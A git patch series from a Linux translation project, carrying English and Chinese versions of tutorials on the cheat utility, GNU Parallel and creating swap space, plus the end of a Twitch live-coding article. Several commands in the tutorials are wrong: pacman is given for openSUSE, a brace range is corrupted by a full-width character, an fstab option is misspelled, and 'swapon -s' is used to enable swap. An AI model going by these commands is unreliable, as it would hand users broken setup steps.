- -It’s highly likely that 99% of folks who find their way to your channel will be friendly and curious. I get the occasional troll, but the moderation tools offered by Twitch and Nightbot really help to discourage this. - -#### Prep time - -Automate your setup as much as possible. My terminal is iTerm, and it lets you save window arrangements and font sizes so you can restore back to them later. I have one window arrangement for streaming and one for non streaming. It’s a massive time saver. I hit one command and everything is the perfect size and in the right position, ready to go. - -There are other apps out there that automate all of your app window placements, have a look to see if any of them would also help. - -Make your font size really large in your terminal and code editor so everyone can see. - -#### Regularity - -Be regular with your schedule. I only stream once a week, but always at the same time. Let folks know if you’re not able to stream during an expected time you normally do. This has netted me a regular audience. Some folks love routine and it’s exactly like catching up with a friend. You’re in a social circle with your community, so treat it that way. - -I want to stream more often, but I know I can’t commit to more than once a week because of travel. I am trying to come up with a way to stream in high quality when on the road, or perhaps just have casual chats and save programming for my regular Sunday stream. I’m still trying to figure this out! - -#### Awkwardness - -It’s going to feel weird when you get started. You’re going to feel nervous about folks watching you code. That’s normal! I felt that really strongly at the beginning, even though I have public speaking experience. I felt like there was nowhere for me to hide, and it scared me. I thought, “everyone is going to think my code is bad, and that I’m a bad developer”. This is a thought pattern that has plagued me my  _entire career_  though, it’s nothing new. I knew that with this, I couldn’t quietly refactor code before pushing to GitHub, which is generally much safer for my reputation as a developer. - -I learned a lot about my programming style by live coding on Twitch. I learned that I’m definitely the “make it work, then make it readable, then make it fast” type. I don’t rehearse the night before anymore (I gave that up after 3 or 4 streams right at the beginning), so I write pretty rough code on Twitch and have to be okay with that. I write my best code when alone with my thoughts and not watching a chat box + talking aloud, and that’s okay. I forget method signatures that I’ve used a thousand times, and make ‘silly’ mistakes in almost every single stream. For most, it’s not a productive environment for being at your best. - -My Twitch community never judges me for this, and they help me out a lot. They understand I’m multitasking, and are really great about pragmatic advice and suggestions. Sometimes they bail me out, and other times I have to explain to them why their suggestion won’t work. It’s really just like regular pair programming! - -I think the ‘warts and all’ approach to this medium is a strength, not a weakness. It makes you more relatable, and it’s important to show that there’s no such thing as the perfect programmer, or the perfect code. It’s probably quite refreshing for new coders to see, and humbling for myself as a more experienced coder. - -### Conclusion - -If you’ve been wanting to get into live coding on Twitch, I encourage you to give it a try! I hope this post helped you if you have been wondering where to start. - -If you’d like to join me on Sundays, you can [follow my channel on Twitch][13] :) - -On my last note, I’d like to personally thank [Mattias Johansson][14] for his wisdom and encouragement early on in my streaming journey. He was incredibly generous, and his [FunFunFunction YouTube channel][15] is a continuous source of inspiration. - -Update: a bunch of folks have been asking about my keyboard and other parts of my workstation. [Here is the complete list of what I use][16]. Thanks for the interest! - --------------------------------------------------------------------------------- - -via: https://medium.freecodecamp.org/lessons-from-my-first-year-of-live-coding-on-twitch-41a32e2f41c1 - -作者:[ Suz Hinton][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://medium.freecodecamp.org/@suzhinton -[1]:https://www.twitch.tv/noopkat -[2]:https://www.twitch.tv/handmade_hero -[3]:http://nuclearthrone.com/twitch/ -[4]:https://twitter.com/nolanlawson -[5]:https://www.youtube.com/watch?v=9FBvpKllTQQ -[6]:https://github.com/noopkat/avrgirl-arduino -[7]:https://www.reddit.com/r/Twitch/comments/4eyva6/a_guide_to_streaming_and_finding_success_on_twitch/ -[8]:https://obsproject.com/ -[9]:https://www.gimp.org/ -[10]:https://github.com/noopkat/study-temp -[11]:https://streamlabs.com/ -[12]:https://beta.nightbot.tv/ -[13]:https://www.twitch.tv/noopkat -[14]:https://twitter.com/mpjme -[15]:https://www.youtube.com/channel/UCO1cgjhGzsSYb1rsB4bFe4Q -[16]:https://gist.github.com/noopkat/5de56cb2c5917175c5af3831a274a2c8 From 935e6cd920c3e8b79f692b377d2b4c8181b96913 Mon Sep 17 00:00:00 2001 From: geekpi Date: Thu, 21 Dec 2017 08:50:06 +0800 Subject: [PATCH 0736/1627] geekpi --- ...ction Of Practical Linux Command Examples.md | 67 ++++++++----------- 1 file changed, 27 insertions(+), 40 deletions(-) rename {sources => translated}/tech/20171207 Cheat – A Collection Of Practical Linux Command Examples.md (61%) diff --git a/sources/tech/20171207 Cheat – A Collection Of Practical Linux Command Examples.md b/translated/tech/20171207 Cheat – A Collection Of Practical Linux Command Examples.md similarity index 61% rename from sources/tech/20171207 Cheat – A Collection Of Practical Linux Command Examples.md rename to translated/tech/20171207 Cheat – A Collection Of Practical Linux Command Examples.md index 615de120d1..6d7d3d0edd 100644 --- a/sources/tech/20171207 Cheat – A Collection Of Practical Linux Command Examples.md +++ b/translated/tech/20171207 Cheat – A Collection Of Practical Linux Command Examples.md @@ -1,48 +1,37 @@ -translating---geekpi - -Cheat – A Collection Of Practical Linux Command Examples +Cheat - 一个实用 Linux 命令示例集合 ====== -Many of us very often checks **[Man Pages][1]** to know about command switches -(options), it shows you the details about command syntax, description, -details, and available switches but it doesn 't has any practical examples. -Hence, we are face some trouble to form a exact command format which we need. +我们中的许多人经常查看 **[ man 页面][1]** 来了解命令开关(选项),它会显示有关命令语法、说明、细节和可用的选项,但它没有任何实际的例子。因此,在组合成一个完整的我们需要的命令时会遇到一些麻烦。 -Are you really facing the trouble on this and want a better solution? i would -advise you to check about cheat utility. +你确实遇到这个麻烦而想要一个更好的解决方案吗?我会建议你试一下 cheat。 -#### What Is Cheat +#### Cheat 是什么 -[Cheat][2] allows you to create and view interactive cheatsheets on the -command-line. It was designed to help remind *nix system administrators of -options for commands that they use frequently, but not frequently enough to -remember. +[cheat][2] 允许你在命令行中创建和查看交互式 cheatsheet。它旨在帮助提醒 *nix 系统管理员 +他们经常使用但还没频繁到会记住的命令的选项。 -#### How to Install Cheat +#### 如何安装 Cheat -Cheat package was developed using python, so install pip package to install -cheat on your system. +cheat 是使用 python 开发的,所以用 pip 来在你的系统上安装 cheat。 -For **`Debian/Ubuntu`** , use [apt-get command][3] or [apt command][4] to -install pip. +对于 **`Debian/Ubuntu`** 用户,请使用[ apt-get 命令][3]或[ apt 命令][4]来安装 pip。 ``` - [For Python2] + [对于 Python2] $ sudo apt install python-pip python-setuptools - [For Python3] + [对于 Python3] $ sudo apt install python3-pip ``` -pip doesn't shipped with **`RHEL/CentOS`** system official repository so, -enable [EPEL Repository][5] and use [YUM command][6] to install pip. +**`RHEL/CentOS`** 官方仓库中没有 pip,因此使用[ EPEL 仓库][5],并使用[ YUM 命令][6]安装 pip。 ``` @@ -50,62 +39,61 @@ enable [EPEL Repository][5] and use [YUM command][6] to install pip. ``` -For **`Fedora`** system, use [dnf Command][7] to install pip. +对于 **`Fedora`** 系统,使用[ dnf 命令][7]来安装 pip。 ``` - [For Python2] + [对于 Python2] $ sudo dnf install python-pip - [For Python3] + [对于 Python3] $ sudo dnf install python3 ``` -For **`Arch Linux`** based systems, use [Pacman Command][8] to install pip. +对于基于 **`Arch Linux`** 的系统,请使用[ Pacman 命令][8] 来安装 pip。 ``` - [For Python2] + [对于 Python2] $ sudo pacman -S python2-pip python-setuptools - [For Python3] + [对于 Python3] $ sudo pacman -S python-pip python3-setuptools ``` -For **`openSUSE`** system, use [Zypper Command][9] to install pip. +对于 **`openSUSE`** 系统,使用[ Zypper 命令][9]来安装 pip。 ``` - [For Python2] + [对于 Python2] $ sudo pacman -S python-pip - [For Python3] + [对于 Python3] $ sudo pacman -S python3-pip ``` -pip is a python module bundled with setuptools, it's one of the recommended -tool for installing Python packages in Linux. +pip 是一个与 setuptools 捆绑在一起的 Python 模块,它是在 Linux 中安装 Python 包推荐的工具之一。 ``` @@ -113,10 +101,9 @@ tool for installing Python packages in Linux. ``` -#### How to Use Cheat +#### 如何使用 Cheat -Run `cheat` followed by corresponding `command` to view the cheatsheet, For -demonstration purpose, we are going to check about `tar` command examples. +运行 `cheat`,然后按相应的`命令`来查看 cheatsheet,作为例子,我们要来看下 `tar` 命令的例子。 ``` @@ -158,7 +145,7 @@ demonstration purpose, we are going to check about `tar` command examples. ``` -Run the following command to see what cheatsheets are available. +运行下面的命令查看可用的 cheatsheet。 ``` @@ -166,7 +153,7 @@ Run the following command to see what cheatsheets are available. ``` -Navigate to help page for more details. +进入帮助页面获取更多详细信息。 ``` @@ -180,7 +167,7 @@ Navigate to help page for more details. via: https://www.2daygeek.com/cheat-a-collection-of-practical-linux-command-examples/ 作者:[Magesh Maruthamuthu][a] -译者:[译者ID](https://github.com/译者ID) +译者:[geekpi](https://github.com/geekpi) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 18b0795dd125b8407ba17cac6304b2064b35bbd9 Mon Sep 17 00:00:00 2001 From: geekpi Date: Thu, 21 Dec 2017 08:52:46 +0800 Subject: [PATCH 0737/1627] translating --- ...pgrade Ubuntu to a Newer Version with This Single Command.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md b/sources/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md index 31581c8f78..ff186c1d80 100644 --- a/sources/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md +++ b/sources/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md @@ -1,3 +1,5 @@ +translating---geekpi + Easily Upgrade Ubuntu to a Newer Version with This Single Command ====== [zzupdate][1] is an open source command line utility that makes the task of upgrading Ubuntu Desktop and Server to newer versions a tad bit easier by combining several update commands into one single command. From 7119fffc893ca7bbfede2f279ad46d2292db09ec Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 21 Dec 2017 16:30:45 +0800 Subject: [PATCH 0738/1627] =?UTF-8?q?translate=20done=20at=202017=E5=B9=B4?= =?UTF-8?q?=2012=E6=9C=88=2021=E6=97=A5=20=E6=98=9F=E6=9C=9F=E5=9B=9B=2016?= =?UTF-8?q?:30:45=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...e Your Entire CPU In Bash With Parallel.md | 104 ------------------ ...e Your Entire CPU In Bash With Parallel.md | 103 +++++++++++++++++ 2 files changed, 103 insertions(+), 104 deletions(-) delete mode 100644 sources/tech/20171219 How To Use Your Entire CPU In Bash With Parallel.md create mode 100644 translated/tech/20171219 How To Use Your Entire CPU In Bash With Parallel.md diff --git a/sources/tech/20171219 How To Use Your Entire CPU In Bash With Parallel.md b/sources/tech/20171219 How To Use Your Entire CPU In Bash With Parallel.md deleted file mode 100644 index ec45641ce9..0000000000 --- a/sources/tech/20171219 How To Use Your Entire CPU In Bash With Parallel.md +++ /dev/null @@ -1,104 +0,0 @@ -translating by lujun9972 -How To Use Your Entire CPU In Bash With Parallel -====== -When a bash command is run it usually gets run in a single thread. This means that it will all the processing work will get executed on a single CPU. As CPU's have scaled out and increased their core count this means that only a small fraction of the available CPU resources will get used to work on your process. - -These unused CPU resources can make a big difference when the work we are trying to get done is bound by the speed that the CPU can crunch the data. This typically happens during media conversion e.g. picture and video, and data compression. - -In this guide, we will look at using the bash program [Parallel][1]. Parallel works by accepting a list as input and then executing a command in parallel across all your CPU cores on that list. Parallel will even send any output to stdout in sequence so it can be piped as stdin for a further command. - -### How To Use Parallel - -Parallel takes a list as input on stdin and then creates a number of processes with a supplied command, this takes the form: -``` -list | parallel command - -``` - -The list can be created by any of the usual bash commands e.g. `cat`, `grep`, `find`. The results of these commands are piped from their stdout to the stdin of parallel e.g.: -``` -find . -type f -name "*.log" | parallel - -``` - -Just like using `-exec` with `find`, `parallel` substitutes each member in the input list as `{}`. Here, `parallel` will gzip every file that `find` outputs: -``` -find . -type f -name "*.log" | parallel gzip {} - -``` - -The following examples of `parallel` in action will make this easier to understand. - -### Using Parallel For JPEG Optimization - -In this example, I took a collection of largish `.jpg`, ~10MB files and ran them through the [MozJPEG][2] JPEG image optimization tool produced by [Mozilla][3]. This tool reduces JPEG image file size while attempting to retain the image quality. This is important for websites in order to keep page load times down. - -Here is a typical `find` command to locate every `.jpg` file in the current directory and then run them through the image compression tool supplied in the MozJPEG package, `cjpeg`: -``` -find . -type f -name "*.jpg" -exec cjpeg -outfile LoRes/{} {} ';' - -``` - -This took `0m44.114s` seconds to run. Here is what `top` looked like while it was running: - -![][4] - -As you can see, only a single of the 8 available cores is working on the single thread. - -Here is the same command run with `parallel`: -``` -find . -type f -name "*.jpg" | parallel cjpeg -outfile LoRes/{} {} - -``` - -This reduces the time to optimize all the images to `0m10.814s`. The difference is clearly seen in this image of `top`: - -![][5] - -All the CPU cores are maxed out and there are 8 threads to match the 8 available CPU cores. - -### Using Parallel With GZIP - -If you need to compress a number of files rather than a single large one then `parallel` will speed things up. If you do need to compress a single file and want to utilize all your CPU cores take a look at the multi-threaded `gzip` replacement [pigz][6]. - -First, I created ~1GB of random data in 100 files: -``` -for i in {1..100}; do dd if=/dev/urandom of=file-$i bs=1MB count=10; done - -``` - -Then I compressed them using another `find -exec` command: -``` -find . -type f -name "file*" -exec gzip {} ';' - -``` - -This took `0m28.028s` to complete and again only used a single core. - -Converting the same command to use `parallel` gives us: -``` -find . -type f -name "file*" | parallel gzip {} - -``` - -This reduces the runtime to `0m5.774s`. - -Parallel is an easy to use tool that you should add to your sysadmins tool bag as it is going to save you a great deal of time in the right situation. - --------------------------------------------------------------------------------- - -via: https://bash-prompt.net/guides/parallell-bash/ - -作者:[Elliot Cooper][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://bash-prompt.net/about -[1]:https://www.gnu.org/software/parallel/ -[2]:https://github.com/mozilla/mozjpeg -[3]:https://www.mozilla.org/ -[4]:https://bash-prompt.net/images/guides/parallell-bash/top-single-core-100.png -[5]:https://bash-prompt.net/images/guides/parallell-bash/top-all-cores-100.png -[6]:https://zlib.net/pigz/ diff --git a/translated/tech/20171219 How To Use Your Entire CPU In Bash With Parallel.md b/translated/tech/20171219 How To Use Your Entire CPU In Bash With Parallel.md new file mode 100644 index 0000000000..3772e3212f --- /dev/null +++ b/translated/tech/20171219 How To Use Your Entire CPU In Bash With Parallel.md @@ -0,0 +1,103 @@ +使用 Parallel 利用起你的所有 CPU 资源 +====== +bash 命令通常单线程运行。这意味着所有的处理工作只在单 CPU 上执行。随着 CPU 规模的扩大以及核心数目的增加,这意味着只有一小部分的 CPU 资源被用于处理你的工作上去了。 + +当我们的工作受制于 CPU 处理数据的速度时,这些未使用的 CPU 资源能产生很大的效用。这种情况在进行多媒体转换(比如图片和视频转换)以及数据压缩中经常遇到。 + +本文中,我们将会使用 [Parallel][1] 程序。Parallel 会接受一个列表作为输入然后在所有 CPU core 上并行地执行命令来处理该列表。Parallel 甚至会按顺序将结果输出到标准输出中,因此它可以用在管道中作为其他命令的标准输入。 + +### 如何使用 Parallel + +Parallel 将标准输入中读取一个列表作为输入,然后创建多个指定命令的进程来处理这个列表,其格式为: +``` +list | parallel command + +``` + +这里的 list 可以由任何常见的 bash 命令创建,例如:`cat`,`grep`,`find`。这些命令的结果通过管道从他们的标准输出传递到 parallel 的标准输入,像这样: +``` +find . -type f -name "*.log" | parallel + +``` + +跟 `find` 中使用 `-exec` 类似,`parallel` 使用`{}`来表示输入列表中的每个元素。下面这个例子中,`parallel` 会使用 gzip 压缩所有 `find` 命令输出的文件: +``` +find . -type f -name "*.log" | parallel gzip {} + +``` + +下面这些实际的使用 `parallel` 的例子可能会更容易理解一些。 + +### 使用 Parallel 来进行 JPEG 压缩 + +在这个例子中,我收集了一些比较大的 `.jpg`( 大约 10MB 大小)文件,要用 [Mozilla][3] 出品的 JPEG 图像压缩工具 [MozJPEG][2] 来进行处理。该工具会在尝试保持图像质量的同时减少 JPEG 图像文件的大小。这对降低网页加载时间很重要。 + +下面是一个普通的 `find` 命令,用来找出当前目录中的所有 `.jpg` 文件然后通过 MozJPEG 包中提供的图像压缩工具 (`cjpeg`) 对其进行处理: +``` +find . -type f -name "*.jpg" -exec cjpeg -outfile LoRes/{} {} ';' + +``` + +总共耗时 `0m44.114s`。改命令运行时的 `top` 看起来是这样的: + +![][4] + +你可以看到,虽然有 8 个核可用,但实际只有单个线程在用单个核。 + +下面用 `parallel` 来运行相同的命令: +``` +find . -type f -name "*.jpg" | parallel cjpeg -outfile LoRes/{} {} + +``` + +这次压缩所有图像的时间缩减到了 `0m10.814s`。从 `top` 现实中可以很清楚地看出不同: + +![][5] + +所有 CPU core 都满负荷运行,有 8 个线程对应使用 8 个 CPU 核。 + +### Parallel 与 GZIP 连用 + +如果你需要压缩多个文件而不是一个大文件,那么 `parallel` 就能用来提高处理速度。如果你需要压缩单个文件而同时又想要利用所有的 CPU 核的话,那么你应该 `gzip` 的多线程替代品 [pigz][6]。 + +首先,我用随机数据创建了 100 个大约 1GB 的文件: +``` +for i in {1。.100}; do dd if=/dev/urandom of=file-$i bs=1MB count=10; done + +``` + +然而我用 `find -exec` 命令来进行压缩: +``` +find . -type f -name "file*" -exec gzip {} ';' + +``` + +总共耗时 `0m28.028s`,而且也是只利用了单核。 + +换成 `parallel` 版本: +``` +find . -type f -name "file*" | parallel gzip {} + +``` + +耗时减少到了 `0m5.774s`。 + +Parallel 是一款非常好用的工具,应该加入到你的系统管理工具包中,在合适的场合它能帮你节省大量的时间。 + +-------------------------------------------------------------------------------- + +via: https://bash-prompt.net/guides/parallell-bash/ + +作者:[Elliot Cooper][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://bash-prompt.net/about +[1]:https://www.gnu.org/software/parallel/ +[2]:https://github.com/mozilla/mozjpeg +[3]:https://www.mozilla.org/ +[4]:https://bash-prompt.net/images/guides/parallell-bash/top-single-core-100.png +[5]:https://bash-prompt.net/images/guides/parallell-bash/top-all-cores-100.png +[6]:https://zlib.net/pigz/ From 4eacf14fbc7f627b0a9d6c138163a83b0f485553 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 21 Dec 2017 16:54:42 +0800 Subject: [PATCH 0739/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Creating=20SWAP?= =?UTF-8?q?=20partition=20using=20FDISK=20&=20FALLOCATE=20commands?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...tition using FDISK & FALLOCATE commands.md | 118 ++++++++++++++++++ 1 file changed, 118 insertions(+) create mode 100644 sources/tech/20170802 Creating SWAP partition using FDISK & FALLOCATE commands.md diff --git a/sources/tech/20170802 Creating SWAP partition using FDISK & FALLOCATE commands.md b/sources/tech/20170802 Creating SWAP partition using FDISK & FALLOCATE commands.md new file mode 100644 index 0000000000..0a8bfb8fa0 --- /dev/null +++ b/sources/tech/20170802 Creating SWAP partition using FDISK & FALLOCATE commands.md @@ -0,0 +1,118 @@ +translating by lujun9972 +Creating SWAP partition using FDISK & FALLOCATE commands +====== +Swap-partition holds the memory which is used in case the physical memory (RAM) is full . When RAM capacity has been utilized to maximum , Linux machine moves inactive pages from memory to swap-space which are then used by the system. Though it gets the work done, it should not be considered as a replacement to physical memory/RAM. + +In most cases, it is advised to keep SWAP-memory equal to size of physical memory at minimum & double the size of physical memory at maximum. So if you have 8 GB RAM on your system, Swap should be between 8-16 GB. + +If a swap-partition has not been configured in your Linux system, your system might start killing off the running process/applications & might cause your system to crash. In this tutorial, we will learn to add swap-partition to Linux system & we will be discussing two methods for creating a swap-partition + + * **Using fdisk command** + * **Using fallocate command** + + + +### First Method (Using Fdisk command) + +Normally, first hdd of the system is named **/dev/sda** & partitions for it are named **/dev/sda1** , **/dev/sda2**. For this tutorial we will using a HDD that have 2 primary partitions on system i.e. /dev/sda1, /dev/sda2 & SWAP will be /dev/sda3. + +Firstly we will create a partition, + +``` +$ fdisk /dev/sda +``` + +to create a new partition type **' n'** . You will now be asked to enter the first cylinder value, just hit enter key to use default value & then you will asked to enter last cylinder value, here we will enter the size of swap partition (we will be using 1000MB). Enter the value in last cylinder as +1000M. + +![swap][2] + +We have now created a partition of size 1000MB but we have not assigned it any partition type, so to assign a partition type, press **" t"** & press enter. + +Now you will be first asked to enter partition number, which is **3** for our partition & then we will asked to enter partition id which for swap it's **82** (to see list of all available partition types, press **" l"** ) & then press " **w "** to save the partition table. + +![swap][4] + +Next we will format our swap partition using mkswap command + +``` +$ mkswap /dev/sda3 +``` + +& will then activate our newly created swap + +``` +$ swapon /dev/sda3 +``` + +But our swap will not be mounted automatically after every reboot. To mount it permanently in our system, we need to append /etc/fstab file. Open /etc/fstab file & make an entry of the following line + +``` +$ vi /etc/fstab +``` + +``` +/dev/sda3 swap swap default 0 0 +``` + +Save & close the file. Our swap now will even work after a reboot. + +### Second Method (using fallocate command) + +I prefer this method as this is easiest & fastest way to create swap. Fallocate is one of the most underestimated & very less used command. Fallocate is used to pre-allocate blocks/size to a files. + +To create a swap using fallocate, we will firstly create a file named **swap_space** in ** '/'**. Next we will allocate 2GB to our file swap_space , + +``` +$ fallocate -l 2G /swap_space +``` + +We will then verify the size of the file by running + +``` +ls-lh /swap_space. +``` + +Next, we will make our /swap_space more secure by changing the file permissions + +``` +$ chmod 600 /swap_space** +``` + +Now only root will be able to read, write on this file. We will now format the swap partition, + +``` +$ mkswap /swap_space +``` + +& then will turn on our swap + +``` +$ swapon -s +``` + +This swap partition will need to be remounted after every reboot. So to make it permanent, edit the /etc/fstab, as we did above & enter the following line + +``` +/swap_space swap swap sw 0 0 +``` + +Save & exit the file. Our swap will now be permanently mounted. We can check if your swap is working or not by running " **free -m** " on your terminal after rebooting the system. + +This completes our tutorial, I hope it was simple enough to understand & learn. If you are having any issues or have have any queries, please mention them in the comment box below. + + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/create-swap-using-fdisk-fallocate/ + +作者:[Shusain][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com/author/shsuain/ +[1]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=668%2C211 +[2]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/fidsk.jpg?resize=668%2C211 +[3]:https://i1.wp.com/linuxtechlab.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif?resize=620%2C157 +[4]:https://i0.wp.com/linuxtechlab.com/wp-content/uploads/2017/02/fidsk-swap-select.jpg?resize=620%2C157 From 2c5fb5bee220428392f6a694a75d6b0730832417 Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Thu, 21 Dec 2017 19:11:37 +0800 Subject: [PATCH 0740/1627] =?UTF-8?q?20171118=20=E6=A0=A1=E5=AF=B9?= =?UTF-8?q?=E5=AE=8C=E6=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Language engineering for great justice.md | 48 +++++++++---------- 1 file changed, 24 insertions(+), 24 deletions(-) diff --git a/translated/tech/20171118 Language engineering for great justice.md b/translated/tech/20171118 Language engineering for great justice.md index fc116e2e18..97f44dcfe0 100644 --- a/translated/tech/20171118 Language engineering for great justice.md +++ b/translated/tech/20171118 Language engineering for great justice.md @@ -1,55 +1,55 @@ -ESR:最合理的语言工程模式 +ESR:程序语言设计的真谛 ============================================================ -当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义、社会学意义,达到了奥地利经济学家所称的“人类行为学praxeology”,这是目的明确的人类行为所能达到的最大范围。 +当你真正掌握了整体化的工程设计思维时,你就会发现高屋建瓴的工程设计已经远远超越了技术优化的层面。我们的每一件创造都催生于人类活动的大背景下,被这种人类活动赋予了广泛的经济学意义、社会学意义,甚至于具有了奥地利经济学家所称的“人类行为学意义praxeology”。而这种人类行为学意义则是明确的人类行为所能达到的最高层次。 -对我来说这并不只是抽象理论。当我在开源开发项目中编写论文时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。 +对我来说这并不只是一种抽象的理论。当我在撰写关于开源项目开发的文章时,文章的内容正是关于人类行为学的 - 这些文章并不涉及哪个具体的软件技术或者话题,而是在讨论科技所服务的人类行为。从人类行为学角度对科技进行更深入的理解,可以帮助我们重塑科技,并且提升我们的生产力和成就感。这种提升并不总是因为我们有了更新的工具,而更多的是因为我们改变了使用现有工具的思路,提升了我们对这些工具的驾驭能力。 -在这个背景下,我的计划之外的文章系列的第三篇中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的、更实用的想法,它们主要是关于计算机语言设计的分析,例如为什么它们会成功,或为什么它们会失败。 +在这个思路之下,我的随笔文章的第三篇中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统级别编程的新时代的到来。在这里,我会把我的统观见解总结成更具体的、更实用的对计算机语言设计的分析。例如总结出为什么一些语言会成功,另一些语言会失败。 -在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。 +在我最近的一篇文章中,我写道:所有计算机语言的设计都是对机器资源和程序员人力成本的相对权衡的结果;是对一种相对价值主张的体现。而这些设计思路都是在硬件算力成本不断下降,程序员人力成本相对稳定且可能不减反增的背景下产生的。我还强调了语言设计在实现了一些原有的权衡方案之后,其未来的转化和演变成本在这种语言的成败中所要扮演的一些额外角色。在文中我也阐述了编程语言设计者是如何为当前和可见的未来寻找新的最优设计方案的。 -现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言、函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题? +现在我要集中讲解一下我在上面段落里最后提到的那个概念,即语言设计工程师们其实可以在多个方面来改进和提高现阶段编程语言的设计水准。比如输入系统的优化,GC (垃圾回收机制) 和手动内存分配的权衡,命令导向、函数导向和面向对象导向的混合和权衡。但是站在人类行为学的角度去考量,我认为设计师们一定会做出更简单的设计权衡,即针对近景问题还是针对远景问题来优化一种语言的设计。 -所谓的“远”、“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。 +所谓的“远”、“近”之分,是指随着硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据这些因素的变化曲线所做出的判断。近景问题是编程人员眼下看到的问题,远景问题则是指可预见的,但未必会很快到来的一系列情况。针对近景问题的解决方案可以被很快部署下去,且能够在短期内非常有效,但随着情况的变化和时间的推移,这种方案可能很快就不适用了。而远景的解决方案可能因为其自身的复杂和超前性而夭折,或是因其代价过高无法被接受和采纳。 -在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题,汇编语言是短期解决方案。说明这种分类适用于非通用语言,还有 roff 标记语言。随着计算机技术的发展,PHP 和 Javascript 逐渐参与到这场游戏中。至于长期的解决方案? Oberon、Ocaml、ML、XML-Docbook 都可以。 它们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。 +在计算机刚刚面世的时候, FORTRAN 就是一个近景设计方案, LISP 语言的设计则是针对远景问题; 汇编语言多是近景设计方案,很好的阐明了这类设计很适用于非通用语言,同样的例子还包括 ROFF 标记语言。PHP 和 Javascript 则是我们后来看到的采用了近景设计思维的语言。那么后来的远景设计方案有哪些例子呢? Oberon、Ocaml、ML、XML-Docbook 都是它的例子。学术研究中设计出的语言多倾向于远景设计,因为在学术研究领域,原创性以及大胆的假设与想法是很重要的。这和学术研究的动机以及其奖励机制很有关系(值得注意的是,在学术研究中,倾向于远景设计的本源动机并非出于技术方面的原因,而是出自于人类行为,即标新立异才能在学术上有成绩)。学术研究中设计出的编程语言是注定会失败的; 因为学术研究的产物常常有高昂的转入成本,无人问津的设计。这类语言也因为在社区中不够流行而不能得到主流的采纳,具有孤立性,且常常被搁置成为半成品。(如上所述的问题正是对 LISP 历史的精辟总结,而且我是以一个对 LISP 语言有深入研究,并深深喜爱它的使用者的身份来评价 LISP 的)。 